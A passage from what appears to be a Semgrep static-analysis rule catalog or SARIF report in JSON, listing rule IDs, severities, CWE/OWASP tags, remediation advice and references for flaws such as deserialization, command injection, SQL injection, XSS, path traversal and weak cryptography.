[https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid","id":"python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid","name":"python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected non-static command inside exec.Cmd. Audit the input to 'exec.Cmd'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside exec.Cmd. Audit the input to 'exec.Cmd'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside exec.Cmd. Audit the input to 'exec.Cmd'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd","id":"go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd","name":"go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask)\n - [https://docs.paramiko.org/en/latest/api/client.html#paramiko.client.SSHClient.exec_command](https://docs.paramiko.org/en/latest/api/client.html#paramiko.client.SSHClient.exec_command)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask","id":"python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask","name":"python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found request data in 'send_mail(...)' that uses 'html_message'. This is dangerous because HTML emails are susceptible to XSS. An attacker could inject data into this HTML email, causing XSS."},"help":{"markdown":"Found request data in 'send_mail(...)' that uses 'html_message'. This is dangerous because HTML emails are susceptible to XSS. An attacker could inject data into this HTML email, causing XSS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message)\n - [https://www.damonkohler.com/2008/12/email-injection.html](https://www.damonkohler.com/2008/12/email-injection.html)\n","text":"Found request data in 'send_mail(...)' that uses 'html_message'. This is dangerous because HTML emails are susceptible to XSS. An attacker could inject data into this HTML email, causing XSS."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message","id":"python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message","name":"python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message","properties":{"precision":"very-high","tags":["CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.db.sqlalchemy-flask.sqlalchemy-flask)\n - [https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text](https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"helpUri":"https://semgrep.dev/r/python.flask.db.sqlalchemy-flask.sqlalchemy-flask","id":"python.flask.db.sqlalchemy-flask.sqlalchemy-flask","name":"python.flask.db.sqlalchemy-flask.sqlalchemy-flask","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.db.sqlalchemy-flask.sqlalchemy-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Facebook OAuth detected"},"help":{"markdown":"Facebook OAuth detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Facebook OAuth detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth","id":"generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth","name":"generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths](https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi","id":"python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi","name":"python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Symmetric cryptographic operations were identified that use Electronic Code Book (ECB) mode. ECB mode is considered insecure as identical plaintext blocks encrypt to identical ciphertexts revealing patterns in the data. Use stronger, better alternatives such as AES-GCM or ChaChaPoly. "},"help":{"markdown":"Symmetric cryptographic operations were identified that use Electronic Code Book (ECB) mode. ECB mode is considered insecure as identical plaintext blocks encrypt to identical ciphertexts revealing patterns in the data. Use stronger, better alternatives such as AES-GCM or ChaChaPoly. \n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n - [https://crypto.stackexchange.com/questions/20941/why-shouldnt-i-use-ecb-encryption](https://crypto.stackexchange.com/questions/20941/why-shouldnt-i-use-ecb-encryption)\n - [https://medium.com/asecuritysite-when-bob-met-alice/surely-no-one-uses-ecb-mode-in-aes-332ed90f29d0](https://medium.com/asecuritysite-when-bob-met-alice/surely-no-one-uses-ecb-mode-in-aes-332ed90f29d0)\n","text":"Symmetric cryptographic operations were identified that use Electronic Code Book (ECB) mode. ECB mode is considered insecure as identical plaintext blocks encrypt to identical ciphertexts revealing patterns in the data. Use stronger, better alternatives such as AES-GCM or ChaChaPoly. "},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode","id":"swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode","name":"swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of AES with no settings detected. By default, java.crypto.Cipher uses ECB mode. ECB doesn't provide message confidentiality and is not semantically secure so should not be used. Instead, use a strong, secure cipher: java.crypto.Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"help":{"markdown":"Use of AES with no settings detected. By default, java.crypto.Cipher uses ECB mode. ECB doesn't provide message confidentiality and is not semantically secure so should not be used. Instead, use a strong, secure cipher: java.crypto.Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html](https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html)\n","text":"Use of AES with no settings detected. By default, java.crypto.Cipher uses ECB mode. ECB doesn't provide message confidentiality and is not semantically secure so should not be used. Instead, use a strong, secure cipher: java.crypto.Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes","id":"java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes","name":"java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"help":{"markdown":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request)\n - [https://github.com/parnurzeal/gorequest](https://github.com/parnurzeal/gorequest)\n","text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request","id":"problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request","name":"problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask","id":"python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask","name":"python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User controlled data in a HTML string may result in XSS"},"help":{"markdown":"User controlled data in a HTML string may result in XSS\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.security.raw-html-concat.raw-html-concat)\n - [https://owasp.org/www-community/attacks/xss/](https://owasp.org/www-community/attacks/xss/)\n","text":"User controlled data in a HTML string may result in XSS"},"helpUri":"https://semgrep.dev/r/javascript.browser.security.raw-html-concat.raw-html-concat","id":"javascript.browser.security.raw-html-concat.raw-html-concat","name":"javascript.browser.security.raw-html-concat.raw-html-concat","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.security.raw-html-concat.raw-html-concat"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password","id":"python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password","name":"python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"abi.encodePacked hash collision with variable length arguments in $F()"},"help":{"markdown":"abi.encodePacked hash collision with variable length arguments in $F()\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.encode-packed-collision.encode-packed-collision)\n - [https://swcregistry.io/docs/SWC-133](https://swcregistry.io/docs/SWC-133)\n","text":"abi.encodePacked hash collision with variable length arguments in $F()"},"helpUri":"https://semgrep.dev/r/solidity.security.encode-packed-collision.encode-packed-collision","id":"solidity.security.encode-packed-collision.encode-packed-collision","name":"solidity.security.encode-packed-collision.encode-packed-collision","properties":{"precision":"very-high","tags":["CWE-20: Improper Input Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.encode-packed-collision.encode-packed-collision"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-json-flask.tainted-json-flask)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://docs.python.org/3/library/json.html](https://docs.python.org/3/library/json.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-json-flask.tainted-json-flask","id":"python.flask.deserialization.tainted-json-flask.tainted-json-flask","name":"python.flask.deserialization.tainted-json-flask.tainted-json-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-json-flask.tainted-json-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a potential path traversal. A malicious actor could control the location of this file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path."},"help":{"markdown":"Detected a potential path traversal. A malicious actor could control the location of this file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal)\n - [https://www.owasp.org/index.php/Path_Traversal](https://www.owasp.org/index.php/Path_Traversal)\n","text":"Detected a potential path traversal. A malicious actor could control the location of this file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path."},"helpUri":"https://semgrep.dev/r/java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal","id":"java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal","name":"java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts or to use the Cookie Policy Middleware to globally set the HttpOnly flag. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"help":{"markdown":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts or to use the Cookie Policy Middleware to globally set the HttpOnly flag. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.audit.cookies.httponly-false.httponly-false)\n - [https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware](https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware)\n - [https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions](https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts or to use the Cookie Policy Middleware to globally set the HttpOnly flag. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"helpUri":"https://semgrep.dev/r/csharp.lang.audit.cookies.httponly-false.httponly-false","id":"csharp.lang.audit.cookies.httponly-false.httponly-false","name":"csharp.lang.audit.cookies.httponly-false.httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.audit.cookies.httponly-false.httponly-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can. The xml parsing library are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, search queries in the XML documents are still vulnerable to XPath injection 